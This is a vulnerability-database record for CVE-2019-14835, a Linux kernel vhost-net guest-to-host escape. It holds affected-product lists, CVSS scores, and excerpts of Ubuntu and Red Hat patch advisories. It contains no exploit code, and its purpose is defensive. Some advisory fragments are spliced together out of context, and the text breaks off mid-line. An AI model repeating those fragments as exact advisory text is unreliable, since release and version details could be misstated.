The problem can be corrected by updating your system to the following package versions:
Ubuntu 14.04 ESM: linux-image-3.13.0-173-generic 3.13.0-173.224 linux-image-3.13.0-173-generic-lpae 3.13.0-173.224 linux-image-3.13.0-173-lowlatency 3.13.0-173.224 linux-image-3.13.0-173-powerpc-e500 3.13.0-173.224 linux-image-3.13.0-173-powerpc-e500mc 3.13.0-173.224 linux-image-3.13.0-173-powerpc-smp 3.13.0-173.224 linux-image-3.13.0-173-powerpc64-emb 3.13.0-173.224 linux-image-3.13.0-173-powerpc64-smp 3.13.0-173.224 linux-image-4.15.0-1059-azure 4.15.0-1059.64~14.04.1 linux-image-4.4.0-1054-aws 4.4.0-1054.58 linux-image-4.4.0-164-generic 4.4.0-164.192~14.04.1 linux-image-4.4.0-164-generic-lpae 4.4.0-164.192~14.04.1 linux-image-4.4.0-164-lowlatency 4.4.0-164.192~14.04.1 linux-image-4.4.0-164-powerpc-e500mc 4.4.0-164.192~14.04.1 linux-image-4.4.0-164-powerpc-smp 4.4.0-164.192~14.04.1 linux-image-4.4.0-164-powerpc64-emb 4.4.0-164.192~14.04.1 linux-image-4.4.0-164-powerpc64-smp 4.4.0-164.192~14.04.1 linux-image-aws 4.4.0.1054.55 linux-image-azure 4.15.0.1059.45 linux-image-generic 3.13.0.173.184 linux-image-generic-lpae 3.13.0.173.184 linux-image-generic-lpae-lts-xenial 4.4.0.164.143 linux-image-generic-lts-xenial 4.4.0.164.143 linux-image-lowlatency 3.13.0.173.184 linux-image-lowlatency-lts-xenial 4.4.0.164.143 linux-image-powerpc-e500 3.13.0.173.184 linux-image-powerpc-e500mc 3.13.0.173.184 linux-image-powerpc-e500mc-lts-xenial 4.4.0.164.143 linux-image-powerpc-smp 3.13.0.173.184 linux-image-powerpc-smp-lts-xenial 4.4.0.164.143 linux-image-powerpc64-emb 3.13.0.173.184 linux-image-powerpc64-emb-lts-xenial 4.4.0.164.143 linux-image-powerpc64-smp 3.13.0.173.184 linux-image-powerpc64-smp-lts-xenial 4.4.0.164.143 linux-image-server 3.13.0.173.184 linux-image-virtual 3.13.0.173.184 linux-image-virtual-lts-xenial 4.4.0.164.143
Ubuntu 12.04 ESM: linux-image-3.13.0-173-generic 3.13.0-173.224~12.04.1 linux-image-3.13.0-173-generic-lpae 3.13.0-173.224~12.04.1 linux-image-3.13.0-173-lowlatency 3.13.0-173.224~12.04.1 linux-image-3.2.0-143-generic 3.2.0-143.190 linux-image-3.2.0-143-generic-pae 3.2.0-143.190 linux-image-3.2.0-143-highbank 3.2.0-143.190 linux-image-3.2.0-143-omap 3.2.0-143.190 linux-image-3.2.0-143-powerpc-smp 3.2.0-143.190 linux-image-3.2.0-143-powerpc64-smp 3.2.0-143.190 linux-image-3.2.0-143-virtual 3.2.0-143.190 linux-image-generic 3.2.0.143.158 linux-image-generic-lpae-lts-trusty 3.13.0.173.161 linux-image-generic-lts-trusty 3.13.0.173.161 linux-image-generic-pae 3.2.0.143.158 linux-image-highbank 3.2.0.143.158 linux-image-omap 3.2.0.143.158 linux-image-powerpc 3.2.0.143.158 linux-image-powerpc-smp 3.2.0.143.158 linux-image-powerpc64-smp 3.2.0.143.158 linux-image-server 3.2.0.143.158 linux-image-virtual 3.2.0.143.158
After a standard system update you need to reboot your computer to make all the necessary changes.
ATTENTION: Due to an unavoidable ABI change the kernel updates have been given a new version number, which requires you to recompile and reinstall all third party kernel modules you might have installed. Unless you manually uninstalled the standard kernel metapackages (e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual, linux-powerpc), a standard system upgrade will automatically perform this as well. 7) - noarch, x86_64
3
Show details on source website{
"affected_products": {
"_id": null,
"data": [
{
"_id": null,
"model": "kernel",
"scope": "lt",
"trust": 1.0,
"vendor": "linux",
"version": "3.16.74"
},
{
"_id": null,
"model": "ubuntu linux",
"scope": "eq",
"trust": 1.0,
"vendor": "canonical",
"version": "19.04"
},
{
"_id": null,
"model": "h300s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "kernel",
"scope": "gte",
"trust": 1.0,
"vendor": "linux",
"version": "4.4"
},
{
"_id": null,
"model": "enterprise linux server",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "7.0"
},
{
"_id": null,
"model": "imanager neteco 6000",
"scope": "eq",
"trust": 1.0,
"vendor": "huawei",
"version": "v600r008c20"
},
{
"_id": null,
"model": "service processor",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "kernel",
"scope": "gte",
"trust": 1.0,
"vendor": "linux",
"version": "4.19"
},
{
"_id": null,
"model": "enterprise linux server aus",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "7.2"
},
{
"_id": null,
"model": "enterprise linux desktop",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "6.0"
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "debian",
"version": "8.0"
},
{
"_id": null,
"model": "enterprise linux eus",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "7.7"
},
{
"_id": null,
"model": "kernel",
"scope": "gte",
"trust": 1.0,
"vendor": "linux",
"version": "4.9"
},
{
"_id": null,
"model": "steelstore cloud integrated storage",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "ubuntu linux",
"scope": "eq",
"trust": 1.0,
"vendor": "canonical",
"version": "12.04"
},
{
"_id": null,
"model": "imanager neteco",
"scope": "eq",
"trust": 1.0,
"vendor": "huawei",
"version": "v600r009c00"
},
{
"_id": null,
"model": "enterprise linux eus",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "7.6"
},
{
"_id": null,
"model": "imanager neteco",
"scope": "eq",
"trust": 1.0,
"vendor": "huawei",
"version": "v600r009c10spc200"
},
{
"_id": null,
"model": "enterprise linux workstation",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "7.0"
},
{
"_id": null,
"model": "manageone",
"scope": "eq",
"trust": 1.0,
"vendor": "huawei",
"version": "6.5.0"
},
{
"_id": null,
"model": "h300e",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "enterprise linux eus",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "7.5"
},
{
"_id": null,
"model": "ubuntu linux",
"scope": "eq",
"trust": 1.0,
"vendor": "canonical",
"version": "18.04"
},
{
"_id": null,
"model": "kernel",
"scope": "gte",
"trust": 1.0,
"vendor": "linux",
"version": "5.2"
},
{
"_id": null,
"model": "leap",
"scope": "eq",
"trust": 1.0,
"vendor": "opensuse",
"version": "15.0"
},
{
"_id": null,
"model": "h700e",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h500s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "enterprise linux for real time",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "8"
},
{
"_id": null,
"model": "enterprise linux server tus",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "7.3"
},
{
"_id": null,
"model": "enterprise linux server aus",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "6.6"
},
{
"_id": null,
"model": "openshift container platform",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "3.11"
},
{
"_id": null,
"model": "aff a700s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "enterprise linux",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "8.0"
},
{
"_id": null,
"model": "kernel",
"scope": "gte",
"trust": 1.0,
"vendor": "linux",
"version": "4.14"
},
{
"_id": null,
"model": "kernel",
"scope": "lt",
"trust": 1.0,
"vendor": "linux",
"version": "4.19.73"
},
{
"_id": null,
"model": "manageone",
"scope": "eq",
"trust": 1.0,
"vendor": "huawei",
"version": "6.5.1rc1.b080"
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "debian",
"version": "9.0"
},
{
"_id": null,
"model": "enterprise linux server tus",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "7.7"
},
{
"_id": null,
"model": "enterprise linux server",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "7.6"
},
{
"_id": null,
"model": "enterprise linux server",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "6.0"
},
{
"_id": null,
"model": "kernel",
"scope": "eq",
"trust": 1.0,
"vendor": "linux",
"version": "5.3"
},
{
"_id": null,
"model": "virtualization",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "4.0"
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "debian",
"version": "10.0"
},
{
"_id": null,
"model": "kernel",
"scope": "lt",
"trust": 1.0,
"vendor": "linux",
"version": "4.14.144"
},
{
"_id": null,
"model": "enterprise linux server tus",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "7.6"
},
{
"_id": null,
"model": "enterprise linux server tus",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "7.4"
},
{
"_id": null,
"model": "data availability services",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "kernel",
"scope": "lt",
"trust": 1.0,
"vendor": "linux",
"version": "4.9.193"
},
{
"_id": null,
"model": "ubuntu linux",
"scope": "eq",
"trust": 1.0,
"vendor": "canonical",
"version": "14.04"
},
{
"_id": null,
"model": "h410c",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "enterprise linux desktop",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "7.0"
},
{
"_id": null,
"model": "fedora",
"scope": "eq",
"trust": 1.0,
"vendor": "fedoraproject",
"version": "29"
},
{
"_id": null,
"model": "h500e",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "kernel",
"scope": "lt",
"trust": 1.0,
"vendor": "linux",
"version": "4.4.193"
},
{
"_id": null,
"model": "solidfire",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "enterprise linux server aus",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "7.3"
},
{
"_id": null,
"model": "kernel",
"scope": "gte",
"trust": 1.0,
"vendor": "linux",
"version": "2.6.34"
},
{
"_id": null,
"model": "h410s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h610s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "enterprise linux for real time",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "7"
},
{
"_id": null,
"model": "manageone",
"scope": "eq",
"trust": 1.0,
"vendor": "huawei",
"version": "6.5.1rc1.b060"
},
{
"_id": null,
"model": "manageone",
"scope": "eq",
"trust": 1.0,
"vendor": "huawei",
"version": "6.5.0.spc100.b210"
},
{
"_id": null,
"model": "fedora",
"scope": "eq",
"trust": 1.0,
"vendor": "fedoraproject",
"version": "30"
},
{
"_id": null,
"model": "enterprise linux workstation",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "6.0"
},
{
"_id": null,
"model": "manageone",
"scope": "eq",
"trust": 1.0,
"vendor": "huawei",
"version": "6.5.rc2.b050"
},
{
"_id": null,
"model": "virtualization host",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "4.0"
},
{
"_id": null,
"model": "enterprise linux server tus",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "7.2"
},
{
"_id": null,
"model": "h700s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "hci management node",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "enterprise linux server aus",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "7.7"
},
{
"_id": null,
"model": "ubuntu linux",
"scope": "eq",
"trust": 1.0,
"vendor": "canonical",
"version": "16.04"
},
{
"_id": null,
"model": "enterprise linux server aus",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "7.6"
},
{
"_id": null,
"model": "kernel",
"scope": "lt",
"trust": 1.0,
"vendor": "linux",
"version": "5.2.15"
},
{
"_id": null,
"model": "enterprise linux server aus",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "7.4"
},
{
"_id": null,
"model": "enterprise linux server aus",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "6.5"
},
{
"_id": null,
"model": "leap",
"scope": "eq",
"trust": 1.0,
"vendor": "opensuse",
"version": "15.1"
},
{
"_id": null,
"model": "imanager neteco 6000",
"scope": "eq",
"trust": 1.0,
"vendor": "huawei",
"version": "v600r008c10spc300"
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2019-14835"
}
]
},
"credits": {
"_id": null,
"data": "Red Hat",
"sources": [
{
"db": "PACKETSTORM",
"id": "154602"
},
{
"db": "PACKETSTORM",
"id": "154565"
},
{
"db": "PACKETSTORM",
"id": "154538"
},
{
"db": "PACKETSTORM",
"id": "154659"
},
{
"db": "PACKETSTORM",
"id": "154540"
}
],
"trust": 0.5
},
"cve": "CVE-2019-14835",
"cvss": {
"_id": null,
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "COMPLETE",
"baseScore": 7.2,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 3.9,
"id": "CVE-2019-14835",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 1.0,
"vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 7.2,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 3.9,
"id": "VHN-146821",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:L/AC:L/AU:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 1.8,
"id": "CVE-2019-14835",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
"author": "secalert@redhat.com",
"availabilityImpact": "HIGH",
"baseScore": 7.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 0.6,
"id": "CVE-2019-14835",
"impactScore": 6.0,
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "CHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:L/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2019-14835",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "secalert@redhat.com",
"id": "CVE-2019-14835",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-146821",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-146821"
},
{
"db": "NVD",
"id": "CVE-2019-14835"
},
{
"db": "NVD",
"id": "CVE-2019-14835"
}
]
},
"description": {
"_id": null,
"data": "A buffer overflow flaw was found, in versions from 2.6.34 to 5.2.x, in the way Linux kernel\u0027s vhost functionality that translates virtqueue buffers to IOVs, logged the buffer descriptors during migration. A privileged guest user able to pass descriptors with invalid length to the host when migration is underway, could use this flaw to increase their privileges on the host. This vulnerability stems from the incorrect verification of data boundaries when the network system or product performs operations on the memory, resulting in incorrect read and write operations to other associated memory locations. Attackers can exploit this vulnerability to cause buffer overflow or heap overflow, etc. 6.5) - x86_64\n\n3. \n(CVE-2019-14835)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. ==========================================================================\nKernel Live Patch Security Notice 0058-1\nOctober 22, 2019\n\nlinux vulnerability\n==========================================================================\n\nA security issue affects these releases of Ubuntu:\n\n| Series | Base kernel | Arch | flavors |\n|------------------+--------------+----------+------------------|\n| Ubuntu 18.04 LTS | 4.15.0 | amd64 | aws |\n| Ubuntu 18.04 LTS | 4.15.0 | amd64 | generic |\n| Ubuntu 18.04 LTS | 4.15.0 | amd64 | lowlatency |\n| Ubuntu 18.04 LTS | 4.15.0 | amd64 | oem |\n| Ubuntu 18.04 LTS | 5.0.0 | amd64 | azure |\n| Ubuntu 14.04 LTS | 4.4.0 | amd64 | generic |\n| Ubuntu 14.04 LTS | 4.4.0 | amd64 | lowlatency |\n| Ubuntu 16.04 LTS | 4.4.0 | amd64 | aws |\n| Ubuntu 16.04 LTS | 4.4.0 | amd64 | generic |\n| Ubuntu 16.04 LTS | 4.4.0 | amd64 | lowlatency |\n| Ubuntu 16.04 LTS | 4.15.0 | amd64 | azure |\n| Ubuntu 16.04 LTS | 4.15.0 | amd64 | generic |\n| Ubuntu 16.04 LTS | 4.15.0 | amd64 | lowlatency |\n\nSummary:\n\nSeveral security issues were fixed in the kernel. \n\nSoftware Description:\n- linux: Linux kernel\n\nDetails:\n\nIt was discovered that a race condition existed in the GFS2 file system in\nthe Linux kernel. A local attacker could possibly use this to cause a\ndenial of service (system crash). (CVE-2016-10905)\n\nIt was discovered that a use-after-free error existed in the block layer\nsubsystem of the Linux kernel when certain failure conditions occurred. A\nlocal attacker could possibly use this to cause a denial of service (system\ncrash) or possibly execute arbitrary code. (CVE-2018-20856)\n\nIt was discovered that the USB gadget Midi driver in the Linux kernel\ncontained a double-free vulnerability when handling certain error\nconditions. A local attacker could use this to cause a denial of service\n(system crash). (CVE-2018-20961)\n\nIt was discovered that the XFS file system in the Linux kernel did not\nproperly handle mount failures in some situations. A local attacker could\npossibly use this to cause a denial of service (system crash) or execute\narbitrary code. (CVE-2018-20976)\n\nIt was discovered that the RSI 91x Wi-Fi driver in the Linux kernel did not\ndid not handle detach operations correctly, leading to a use-after-free\nvulnerability. A physically proximate attacker could use this to cause a\ndenial of service (system crash) or possibly execute arbitrary code. \n(CVE-2018-21008)\n\nIt was discovered that the Intel Wi-Fi device driver in the Linux kernel\ndid not properly validate certain Tunneled Direct Link Setup (TDLS). A\nphysically proximate attacker could use this to cause a denial of service\n(Wi-Fi disconnect). (CVE-2019-0136)\n\nIt was discovered that the Linux kernel on ARM processors allowed a tracing\nprocess to modify a syscall after a seccomp decision had been made on that\nsyscall. A local attacker could possibly use this to bypass seccomp\nrestrictions. (CVE-2019-2054)\n\nIt was discovered that an integer overflow existed in the Binder\nimplementation of the Linux kernel, leading to a buffer overflow. A local\nattacker could use this to escalate privileges. (CVE-2019-2181)\n\nIt was discovered that the Marvell Wireless LAN device driver in the Linux\nkernel did not properly validate the BSS descriptor. A local attacker could\npossibly use this to cause a denial of service (system crash) or possibly\nexecute arbitrary code. (CVE-2019-3846)\n\nIt was discovered that a heap buffer overflow existed in the Marvell\nWireless LAN device driver for the Linux kernel. An attacker could use this\nto cause a denial of service (system crash) or possibly execute arbitrary\ncode. (CVE-2019-10126)\n\nIt was discovered that the Bluetooth UART implementation in the Linux\nkernel did not properly check for missing tty operations. A local attacker\ncould use this to cause a denial of service. (CVE-2019-10207)\n\nJonathan Looney discovered that an integer overflow existed in the Linux\nkernel when handling TCP Selective Acknowledgments (SACKs). A remote\nattacker could use this to cause a denial of service (system crash). \n(CVE-2019-11477)\n\nJonathan Looney discovered that the TCP retransmission queue implementation\nin the Linux kernel could be fragmented when handling certain TCP Selective\nAcknowledgment (SACK) sequences. A remote attacker could use this to cause\na denial of service. (CVE-2019-11478)\n\nIt was discovered that the ext4 file system implementation in the Linux\nkernel did not properly zero out memory in some situations. A local\nattacker could use this to expose sensitive information (kernel memory). \n(CVE-2019-11833)\n\nIt was discovered that the PowerPC dlpar implementation in the Linux kernel\ndid not properly check for allocation errors in some situations. A local\nattacker could possibly use this to cause a denial of service (system\ncrash). (CVE-2019-12614)\n\nIt was discovered that the floppy driver in the Linux kernel did not\nproperly validate meta data, leading to a buffer overread. A local attacker\ncould use this to cause a denial of service (system crash). \n(CVE-2019-14283)\n\nIt was discovered that the floppy driver in the Linux kernel did not\nproperly validate ioctl() calls, leading to a division-by-zero. A local\nattacker could use this to cause a denial of service (system crash). \n(CVE-2019-14284)\n\nWen Huang discovered that the Marvell Wi-Fi device driver in the Linux\nkernel did not properly perform bounds checking, leading to a heap\noverflow. A local attacker could use this to cause a denial of service\n(system crash) or possibly execute arbitrary code. (CVE-2019-14814)\n\nWen Huang discovered that the Marvell Wi-Fi device driver in the Linux\nkernel did not properly perform bounds checking, leading to a heap\noverflow. A local attacker could use this to cause a denial of service\n(system crash) or possibly execute arbitrary code. (CVE-2019-14815)\n\nWen Huang discovered that the Marvell Wi-Fi device driver in the Linux\nkernel did not properly perform bounds checking, leading to a heap\noverflow. A local attacker could use this to cause a denial of service\n(system crash) or possibly execute arbitrary code. (CVE-2019-14816)\n\nMatt Delco discovered that the KVM hypervisor implementation in the Linux\nkernel did not properly perform bounds checking when handling coalesced\nMMIO write operations. A local attacker with write access to /dev/kvm could\nuse this to cause a denial of service (system crash). (CVE-2019-14821)\n\nPeter Pi discovered a buffer overflow in the virtio network backend\n(vhost_net) implementation in the Linux kernel. (CVE-2019-14835)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your livepatches to the following\nversions:\n\n| Kernel | Version | flavors |\n|--------------------------+----------+--------------------------|\n| 4.4.0-148.174 | 58.1 | lowlatency, generic |\n| 4.4.0-148.174~14.04.1 | 58.1 | lowlatency, generic |\n| 4.4.0-150.176 | 58.1 | generic, lowlatency |\n| 4.4.0-150.176~14.04.1 | 58.1 | lowlatency, generic |\n| 4.4.0-151.178 | 58.1 | lowlatency, generic |\n| 4.4.0-151.178~14.04.1 | 58.1 | generic, lowlatency |\n| 4.4.0-154.181 | 58.1 | lowlatency, generic |\n| 4.4.0-154.181~14.04.1 | 58.1 | generic, lowlatency |\n| 4.4.0-157.185 | 58.1 | lowlatency, generic |\n| 4.4.0-157.185~14.04.1 | 58.1 | generic, lowlatency |\n| 4.4.0-159.187 | 58.1 | lowlatency, generic |\n| 4.4.0-159.187~14.04.1 | 58.1 | generic, lowlatency |\n| 4.4.0-161.189 | 58.1 | lowlatency, generic |\n| 4.4.0-161.189~14.04.1 | 58.1 | lowlatency, generic |\n| 4.4.0-164.192 | 58.1 | lowlatency, generic |\n| 4.4.0-164.192~14.04.1 | 58.1 | lowlatency, generic |\n| 4.4.0-165.193 | 58.1 | generic, lowlatency |\n| 4.4.0-1083.93 | 58.1 | aws |\n| 4.4.0-1084.94 | 58.1 | aws |\n| 4.4.0-1085.96 | 58.1 | aws |\n| 4.4.0-1087.98 | 58.1 | aws |\n| 4.4.0-1088.99 | 58.1 | aws |\n| 4.4.0-1090.101 | 58.1 | aws |\n| 4.4.0-1092.103 | 58.1 | aws |\n| 4.4.0-1094.105 | 58.1 | aws |\n| 4.15.0-50.54 | 58.1 | generic, lowlatency |\n| 4.15.0-50.54~16.04.1 | 58.1 | generic, lowlatency |\n| 4.15.0-51.55 | 58.1 | generic, lowlatency |\n| 4.15.0-51.55~16.04.1 | 58.1 | generic, lowlatency |\n| 4.15.0-52.56 | 58.1 | lowlatency, generic |\n| 4.15.0-52.56~16.04.1 | 58.1 | generic, lowlatency |\n| 4.15.0-54.58 | 58.1 | generic, lowlatency |\n| 4.15.0-54.58~16.04.1 | 58.1 | generic, lowlatency |\n| 4.15.0-55.60 | 58.1 | generic, lowlatency |\n| 4.15.0-58.64 | 58.1 | generic, lowlatency |\n| 4.15.0-58.64~16.04.1 | 58.1 | lowlatency, generic |\n| 4.15.0-60.67 | 58.1 | lowlatency, generic |\n| 4.15.0-60.67~16.04.1 | 58.1 | generic, lowlatency |\n| 4.15.0-62.69 | 58.1 | generic, lowlatency |\n| 4.15.0-62.69~16.04.1 | 58.1 | lowlatency, generic |\n| 4.15.0-64.73 | 58.1 | generic, lowlatency |\n| 4.15.0-64.73~16.04.1 | 58.1 | lowlatency, generic |\n| 4.15.0-65.74 | 58.1 | lowlatency, generic |\n| 4.15.0-1038.43 | 58.1 | oem |\n| 4.15.0-1039.41 | 58.1 | aws |\n| 4.15.0-1039.44 | 58.1 | oem |\n| 4.15.0-1040.42 | 58.1 | aws |\n| 4.15.0-1041.43 | 58.1 | aws |\n| 4.15.0-1043.45 | 58.1 | aws |\n| 4.15.0-1043.48 | 58.1 | oem |\n| 4.15.0-1044.46 | 58.1 | aws |\n| 4.15.0-1045.47 | 58.1 | aws |\n| 4.15.0-1045.50 | 58.1 | oem |\n| 4.15.0-1047.49 | 58.1 | aws |\n| 4.15.0-1047.51 | 58.1 | azure |\n| 4.15.0-1048.50 | 58.1 | aws |\n| 4.15.0-1049.54 | 58.1 | azure |\n| 4.15.0-1050.52 | 58.1 | aws |\n| 4.15.0-1050.55 | 58.1 | azure |\n| 4.15.0-1050.57 | 58.1 | oem |\n| 4.15.0-1051.53 | 58.1 | aws |\n| 4.15.0-1051.56 | 58.1 | azure |\n| 4.15.0-1052.57 | 58.1 | azure |\n| 4.15.0-1055.60 | 58.1 | azure |\n| 4.15.0-1056.61 | 58.1 | azure |\n| 4.15.0-1056.65 | 58.1 | oem |\n| 4.15.0-1057.62 | 58.1 | azure |\n| 4.15.0-1057.66 | 58.1 | oem |\n| 4.15.0-1059.64 | 58.1 | azure |\n| 5.0.0-1014.14~18.04.1 | 58.1 | azure |\n| 5.0.0-1016.17~18.04.1 | 58.1 | azure |\n| 5.0.0-1018.19~18.04.1 | 58.1 | azure |\n| 5.0.0-1020.21~18.04.1 | 58.1 | azure |\n\nSupport Information:\n\nKernels older than the levels listed below do not receive livepatch\nupdates. Please upgrade your kernel as soon as possible. \n\n| Series | Version | Flavors |\n|------------------+------------------+--------------------------|\n| Ubuntu 18.04 LTS | 4.15.0-1039 | aws |\n| Ubuntu 16.04 LTS | 4.4.0-1083 | aws |\n| Ubuntu 18.04 LTS | 5.0.0-1000 | azure |\n| Ubuntu 16.04 LTS | 4.15.0-1047 | azure |\n| Ubuntu 18.04 LTS | 4.15.0-50 | generic lowlatency |\n| Ubuntu 16.04 LTS | 4.15.0-50 | generic lowlatency |\n| Ubuntu 14.04 LTS | 4.4.0-148 | generic lowlatency |\n| Ubuntu 18.04 LTS | 4.15.0-1038 | oem |\n| Ubuntu 16.04 LTS | 4.4.0-148 | generic lowlatency |\n\nReferences:\n CVE-2016-10905, CVE-2018-20856, CVE-2018-20961, CVE-2018-20976, \n CVE-2018-21008, CVE-2019-0136, CVE-2019-2054, CVE-2019-2181, \n CVE-2019-3846, CVE-2019-10126, CVE-2019-10207, CVE-2019-11477, \n CVE-2019-11478, CVE-2019-11833, CVE-2019-12614, CVE-2019-14283, \n CVE-2019-14284, CVE-2019-14814, CVE-2019-14815, CVE-2019-14816, \n CVE-2019-14821, CVE-2019-14835\n\n\n-- \nubuntu-security-announce mailing list\nubuntu-security-announce@lists.ubuntu.com\nModify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n==================================================================== \nRed Hat Security Advisory\n\nSynopsis: Important: kernel security update\nAdvisory ID: RHSA-2019:2866-01\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://access.redhat.com/errata/RHSA-2019:2866\nIssue date: 2019-09-23\nCVE Names: CVE-2019-14835\n====================================================================\n1. Summary:\n\nAn update for kernel is now available for Red Hat Enterprise Linux 7.5\nExtended Update Support. \n\nRed Hat Product Security has rated this update as having a security impact\nof Important. A Common Vulnerability Scoring System (CVSS) base score,\nwhich gives a detailed severity rating, is available for each vulnerability\nfrom the CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux ComputeNode EUS (v. 7.5) - noarch, x86_64\nRed Hat Enterprise Linux ComputeNode Optional EUS (v. 7.5) - x86_64\nRed Hat Enterprise Linux Server EUS (v. 7.5) - noarch, ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Server Optional EUS (v. 7.5) - ppc64, ppc64le, x86_64\n\n3. \n(CVE-2019-14835)\n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nThe system must be rebooted for this update to take effect. \n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1750727 - CVE-2019-14835 kernel: vhost-net: guest to host kernel escape during migration\n\n6. Package List:\n\nRed Hat Enterprise Linux ComputeNode EUS (v. 